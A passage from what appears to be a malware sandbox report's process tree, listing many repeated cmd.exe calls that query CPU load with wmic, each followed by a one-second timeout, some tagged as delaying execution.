- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1264
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3560
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2280
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3508
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:744
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3700
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4548
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3976
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4812
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3288
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:744
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2144
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3984
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4696
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2788
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:700
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2144
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5076
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3088
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4680
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3696
